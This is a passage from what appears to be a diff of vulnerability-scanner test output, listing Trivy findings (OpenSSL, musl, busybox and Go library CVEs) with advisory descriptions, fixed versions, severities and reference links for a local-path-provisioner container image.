"https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23839", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "https://access.redhat.com/security/cve/CVE-2021-23839", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", + "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", + "name": "openssl: incorrect SSLv2 rollback protection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", + "value": "https://avd.aquasec.com/nvd/cve-2021-23839", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", + "value": "https://access.redhat.com/security/cve/CVE-2021-23839", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.24-r10", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-28928", + "installedVersion": "1.1.24-r8", + "packageName": "musl", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "https://musl.libc.org/releases.html", + "https://ubuntu.com/security/notices/USN-5990-1", + "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2020-28928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://musl.libc.org/releases.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://ubuntu.com/security/notices/USN-5990-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.24-r10", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-28928", + "installedVersion": "1.1.24-r8", + "packageName": "musl-utils", + "references": [ + "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "https://musl.libc.org/releases.html", + "https://ubuntu.com/security/notices/USN-5990-1", + "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + ], + }, + "category": "Vulnerability", + "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-28928", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20201021035429-f5854403a974", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://musl.libc.org/releases.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5990-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r20", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-28831", + "installedVersion": "1.31.1-r16", + "packageName": "ssl_client", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-28831", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", + 